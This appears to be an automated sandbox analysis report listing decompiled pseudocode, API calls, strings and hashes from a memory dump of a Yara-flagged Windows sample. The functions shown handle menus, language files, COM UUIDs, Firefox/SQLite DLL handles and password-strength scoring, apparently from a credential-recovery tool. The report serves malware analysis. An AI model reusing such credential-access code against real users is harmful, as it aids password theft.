                                                                                			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E004118A0(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407A64(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4171b4 =  *0x4171b4 + 1;
								_t64 =  *0x4171b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407D89(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}











                                                                                0x00407a64
                                                                                0x00407a67
                                                                                0x00407a6f
                                                                                0x00407a7a
                                                                                0x00407a84
                                                                                0x00407a88
                                                                                0x00407a8c
                                                                                0x00407bb2
                                                                                0x00407bb8
                                                                                0x00407a92
                                                                                0x00407a97
                                                                                0x00407a9e
                                                                                0x00407aa3
                                                                                0x00407aaa
                                                                                0x00407ab9
                                                                                0x00407ac4
                                                                                0x00407acc
                                                                                0x00407ad0
                                                                                0x00407adc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407ae6
                                                                                0x00407b8a
                                                                                0x00407b8a
                                                                                0x00407b8e
                                                                                0x00407b90
                                                                                0x00407b91
                                                                                0x00407b95
                                                                                0x00407b98
                                                                                0x00407b9d
                                                                                0x00407b9d
                                                                                0x00000000
                                                                                0x00407b8e
                                                                                0x00407aec
                                                                                0x00407afa
                                                                                0x00407b01
                                                                                0x00407b0d
                                                                                0x00407b12
                                                                                0x00407b19
                                                                                0x00407b1d
                                                                                0x00407b22
                                                                                0x00407b30
                                                                                0x00407b3c
                                                                                0x00407b3c
                                                                                0x00407b24
                                                                                0x00407b28
                                                                                0x00407b28
                                                                                0x00407b22
                                                                                0x00407b4b
                                                                                0x00407b53
                                                                                0x00407b54
                                                                                0x00407b5a
                                                                                0x00407b68
                                                                                0x00407b6e
                                                                                0x00407b6e
                                                                                0x00407b84
                                                                                0x00407b84
                                                                                0x00000000
                                                                                0x00407ba0
                                                                                0x00407ba0
                                                                                0x00407ba4
                                                                                0x00407ba8
                                                                                0x00000000
                                                                                0x00407a97

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                • String ID: 0$6
                                                                                • API String ID: 1757351179-3849865405
                                                                                • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                                • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E988, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                • memcpy.MSVCRT ref: 0040EA04
                                                                                • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                Strings
                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                • API String ID: 1640410171-2022683286
                                                                                • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                                • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404837, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00404837(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                0x00404844
                                                                                0x0040484b
                                                                                0x00404852
                                                                                0x00404854
                                                                                0x0040485c
                                                                                0x00404860
                                                                                0x0040488a
                                                                                0x0040488a
                                                                                0x00404892
                                                                                0x00404893
                                                                                0x00404898
                                                                                0x004048b5
                                                                                0x0040489a
                                                                                0x004048a7
                                                                                0x004048b0
                                                                                0x004048b0
                                                                                0x00404898
                                                                                0x00404868
                                                                                0x00404870
                                                                                0x00404876
                                                                                0x00404879
                                                                                0x00404879
                                                                                0x0040487c
                                                                                0x00404884
                                                                                0x00000000
                                                                                0x00404886
                                                                                0x00404886
                                                                                0x00000000
                                                                                0x00404886

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                                • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040488A
                                                                                • MessageBoxA.USER32 ref: 004048A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                • API String ID: 2780580303-317687271
                                                                                • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                                • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004081B5, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E004081B5(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E0040614B(_a4);
				if(_t3 != 0) {
					strcpy(0x4171b8, _a4);
					strcpy(0x4172c0, "general");
					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
					asm("sbb eax, eax");
					 *0x417304 =  ~(_t6 - 1) + 1;
					E00407DC1(0x417308, "charset", 0x3f);
					E00407DC1(0x417348, "TranslatorName", 0x3f);
					return E00407DC1(0x417388, "TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                0x004081b9
                                                                                0x004081c1
                                                                                0x004081cf
                                                                                0x004081df
                                                                                0x004081f0
                                                                                0x004081f9
                                                                                0x00408208
                                                                                0x0040820d
                                                                                0x0040821e
                                                                                0x00000000
                                                                                0x0040823b
                                                                                0x0040823c

                                                                                APIs
                                                                                  • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                                • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                                  • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 185930432-2094606381
                                                                                • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                                • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DEA9, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040DEA9() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}







                                                                                0x0040debf
                                                                                0x0040dec8
                                                                                0x0040deca
                                                                                0x0040ded4
                                                                                0x0040ded6
                                                                                0x0040ded9
                                                                                0x0040ded9
                                                                                0x0040dedd
                                                                                0x0040dee0
                                                                                0x0040dee0
                                                                                0x0040dee4
                                                                                0x00000000
                                                                                0x0040dee7
                                                                                0x0040deed

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(nss3.dll,73B757D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                                • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                                • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHandleLibraryModule
                                                                                • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                • API String ID: 662261464-3550686275
                                                                                • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                                • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E172, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E0040E172(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E004069D2(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E00406325( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E00406325( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                0x0040e172
                                                                                0x0040e172
                                                                                0x0040e17f
                                                                                0x0040e18a
                                                                                0x0040e193
                                                                                0x0040e1b3
                                                                                0x0040e1b8
                                                                                0x0040e200
                                                                                0x0040e249
                                                                                0x0040e202
                                                                                0x0040e210
                                                                                0x0040e217
                                                                                0x0040e223
                                                                                0x0040e232
                                                                                0x0040e239
                                                                                0x0040e23d
                                                                                0x0040e242
                                                                                0x0040e1ba
                                                                                0x0040e1c8
                                                                                0x0040e1cf
                                                                                0x0040e1db
                                                                                0x0040e1e8
                                                                                0x0040e1ed
                                                                                0x0040e1f3
                                                                                0x0040e1f8
                                                                                0x0040e251
                                                                                0x0040e254
                                                                                0x0040e254
                                                                                0x0040e196
                                                                                0x0040e197
                                                                                0x0040e198
                                                                                0x00000000
                                                                                0x0040e19e
                                                                                0x0040e181
                                                                                0x00000000

                                                                                APIs
                                                                                • strchr.MSVCRT ref: 0040E18A
                                                                                • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                  • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                                  • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                                  • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                                • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                                • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                                • memset.MSVCRT ref: 0040E1CF
                                                                                  • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                  • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                • memset.MSVCRT ref: 0040E217
                                                                                • memcpy.MSVCRT ref: 0040E232
                                                                                • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 1680921474-1821301763
                                                                                • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                                • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405BE4, Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401657(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
				 *__esp = 0x3ee;
				GetDlgItem(??, ??) = E0040F037(__eax);
				 *__esp = 0x3ef;
				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
				 *__esp = 0x3f4;
				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
				__eax =  *(__ebx + 4);
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}









                                                                                0x00405be4
                                                                                0x00405be4
                                                                                0x00405be4
                                                                                0x00405be9
                                                                                0x00405bea
                                                                                0x00405bed
                                                                                0x00405bf8
                                                                                0x00405bfb
                                                                                0x00405c07
                                                                                0x00405c16
                                                                                0x00405c1a
                                                                                0x00405c1a
                                                                                0x00405c24
                                                                                0x00405c26
                                                                                0x00405c2a
                                                                                0x00405c30
                                                                                0x00405c3c
                                                                                0x00405c41
                                                                                0x00405c4e
                                                                                0x00405c53
                                                                                0x00405c60
                                                                                0x00405c65
                                                                                0x00405c72
                                                                                0x00405c77
                                                                                0x00405c80
                                                                                0x00405c86
                                                                                0x00405c87
                                                                                0x00405c89
                                                                                0x00405c8b
                                                                                0x0040163a
                                                                                0x00401640
                                                                                0x00401647
                                                                                0x0040164d
                                                                                0x00401656

                                                                                APIs
                                                                                • GetClientRect.USER32 ref: 00405BFB
                                                                                • GetWindow.USER32(?,00000005), ref: 00405C13
                                                                                • GetWindow.USER32(00000000), ref: 00405C16
                                                                                  • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                                                  • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                                                • GetDlgItem.USER32 ref: 00405C39
                                                                                • GetDlgItem.USER32 ref: 00405C4B
                                                                                • GetDlgItem.USER32 ref: 00405C5D
                                                                                • GetDlgItem.USER32 ref: 00405C6F
                                                                                • GetDlgItem.USER32 ref: 00405C7D
                                                                                • SetFocus.USER32(00000000), ref: 00405C80
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                • String ID:
                                                                                • API String ID: 2187283481-0
                                                                                • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                                                • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401A50, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E00401A50(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045E8( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x414510;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x414518;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x414520;
								} else {
									L30:
									_t159 = _t165 +  *0x414528;
								}
								goto L41;
							}
						} else {
							E004045E8( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x414508;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L004115B8();
					_v36 = _t159;
					 *_t125 =  *0x414500;
					L004115B8();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}


































                                                                                0x00401a50
                                                                                0x00401a50
                                                                                0x00401a56
                                                                                0x00401a5c
                                                                                0x00401a61
                                                                                0x00401a63
                                                                                0x00401a65
                                                                                0x00401a69
                                                                                0x00401a6d
                                                                                0x00401a6e
                                                                                0x00401a72
                                                                                0x00401a76
                                                                                0x00401a7a
                                                                                0x00401a7e
                                                                                0x00401a82
                                                                                0x00401a86
                                                                                0x00401a8a
                                                                                0x00401a92
                                                                                0x00401a96
                                                                                0x00401a9a
                                                                                0x00401a9e
                                                                                0x00401aa4
                                                                                0x00401aa4
                                                                                0x00401aad
                                                                                0x00401ab1
                                                                                0x00401ab3
                                                                                0x00401ab3
                                                                                0x00401abd
                                                                                0x00401abf
                                                                                0x00401abf
                                                                                0x00401ac9
                                                                                0x00401acb
                                                                                0x00401acb
                                                                                0x00401ad5
                                                                                0x00401ad7
                                                                                0x00401ad7
                                                                                0x00401ae1
                                                                                0x00401ae3
                                                                                0x00401ae3
                                                                                0x00401aed
                                                                                0x00401aef
                                                                                0x00401aef
                                                                                0x00401af6
                                                                                0x00401b01
                                                                                0x00401b04
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401af8
                                                                                0x00401afb
                                                                                0x00401b06
                                                                                0x00401b06
                                                                                0x00401afd
                                                                                0x00401afd
